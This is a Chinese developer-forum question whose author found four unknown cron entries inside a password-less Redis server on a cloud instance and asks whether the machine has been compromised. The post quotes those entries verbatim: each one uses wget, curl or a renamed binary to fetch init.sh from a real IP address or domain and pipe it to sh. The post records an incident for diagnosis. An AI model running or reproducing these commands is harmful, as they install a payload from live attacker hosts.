开发者社区数据库文章正文

redis没设置密码，莫名被设置了4个sh脚本

2024-05-14 297

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

本文涉及的产品

Redis 开源版，标准版 2GB

云数据库 Tair（兼容Redis），内存型 2GB

简介： 阿里云ECS实例上未设密码的Redis服务被发现含有未知来源的SH脚本，这些脚本定时从外部URL下载并执行代码。这可能是服务器遭受恶意攻击的迹象。建议立即检查系统日志，确认是否被黑，并移除这些脚本。同时，为Redis设置密码，加强安全防护。若不确定，可寻求专业安全团队帮助。

在阿里云上买了一个esc机器，我在上面简单的部署了一个redis服务，由于是随便弄弄玩的，所以redis并没有设置密码登录，这几天登录ecs机器后突然发现，redis上莫名多了几个sh脚本，这是咋回事？如下几张图

四个sh的链接在这里
*/5 root wd1 -q -O- http://45.83.122.25/3nFTk7/init.sh | sh
*/3 root wget -q -O- http://pyats.top/3nFTk7/init.sh | sh
*/4 root curl -fsSL http://45.83.122.25/3nFTk7/init.sh | sh
*/5 root wd1 -q -O- http://45.83.122.25/3nFTk7/init.sh | sh

有没有大神解答一下，这种情况ecs机器是否已经被黑了？该怎么解决.

文章标签：

云数据库 Tair（兼容 Redis）

Shell

NoSQL

Redis

数据安全/隐私保护

弹性计算

关键词：

云数据库 Tair（兼容 Redis）脚本

云数据库 Tair（兼容 Redis）密码

云数据库 Tair（兼容 Redis）设置

云数据库 Tair（兼容 Redis）设置密码

相关实践学习

基于Redis实现在线游戏积分排行榜

本场景将介绍如何基于Redis数据库实现在线游戏中的游戏玩家积分排行榜功能。

云数据库 Redis 版使用教程

云数据库Redis版是兼容Redis协议标准的、提供持久化的内存数据库服务，基于高可靠双机热备架构及可无缝扩展的集群架构，满足高读写性能场景及容量需弹性变配的业务需求。产品详情：https://www.aliyun.com/product/kvstore     ------------------------------------------------------------------------- 阿里云数据库体验：数据库上云实战开发者云会免费提供一台带自建MySQL的源数据库 ECS 实例和一台目标数据库 RDS实例。跟着指引，您可以一步步实现将ECS自建数据库迁移到目标数据库RDS。点击下方链接，领取免费ECS&RDS资源，30分钟完成数据库上云实战！https://developer.aliyun.com/adc/scenario/51eefbd1894e42f6bb9acacadd3f9121?spm=a2c6h.13788135.J_3257954370.9.4ba85f24utseFl

木木_PAgZn

听白

23天前

缓存 NoSQL Redis

Redis 脚本

10月更文挑战第18天

听白

31 3 3

java冯坚持

1月前

NoSQL Java Redis

shiro学习四：使用springboot整合shiro，正常的企业级后端开发shiro认证鉴权流程。使用redis做token的过滤。md5做密码的加密。

这篇文章介绍了如何使用Spring Boot整合Apache Shiro框架进行后端开发，包括认证和授权流程，并使用Redis存储Token以及MD5加密用户密码。

java冯坚持

24 0 0

shiro学习四：使用springboot整合shiro，正常的企业级后端开发shiro认证鉴权流程。使用redis做token的过滤。md5做密码的加密。

武子康

1月前

缓存分布式计算 NoSQL

大数据-43 Redis 功能扩展 Lua 脚本对Redis扩展 eval redis.call redis.pcall

武子康

26 2 2

小王老师呀

2月前

NoSQL Linux Redis

Linux Redis 服务设置开机自启动

【9月更文挑战第2天】在 Linux 系统中，可使用两种方法设置 Redis 开机自启动：一是通过创建 `redis.service` 文件并利用 systemd 进行管理，包括定义服务参数和启动脚本；二是编辑 `/etc/rc.local` 文件，在其中添加启动命令。推荐使用 systemd 方法，因为它更符合现代 Linux 系统的设计理念。设置完成后，可通过 `sudo systemctl status redis.service` 检查服务状态。

小王老师呀

291 3 3

路边两盏灯

3月前

存储缓存 NoSQL

【Azure Redis 缓存 Azure Cache For Redis】如何设置让Azure Redis中的RDB文件暂留更久(如7天)

路边两盏灯

45 1 1

。思索

3月前

NoSQL Redis

Redis——批量设置key的过期时间

。思索

53 1 1

你都不懂

4月前

NoSQL 网络安全 Redis

Redis 密码设置和查看密码

【7月更文挑战第28天】

你都不懂

825 3 3

你都不懂

4月前

NoSQL 安全 Redis

如何查看Redis的用户名和密码

【7月更文挑战第29天】

你都不懂

1286 3 3

路边两盏灯

3月前

存储缓存 NoSQL

【Azure Redis 缓存】由Azure Redis是否可以自定义密码而引申出Azure PaaS的Redis服务是否可以和自建的Redis进行主从配置呢？

路边两盏灯

32 0 0

路边两盏灯

3月前

缓存监控 NoSQL

【Azure Redis 缓存】使用Python代码获取Azure Redis的监控指标值 (含Powershell脚本方式)

路边两盏灯

21 0 0

redis没设置密码，莫名被设置了4个sh脚本

热门文章

最新文章

相关课程

相关电子书

相关实验场景

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

redis没设置密码，莫名被设置了4个sh脚本

热门文章

最新文章

相关课程

相关电子书

相关实验场景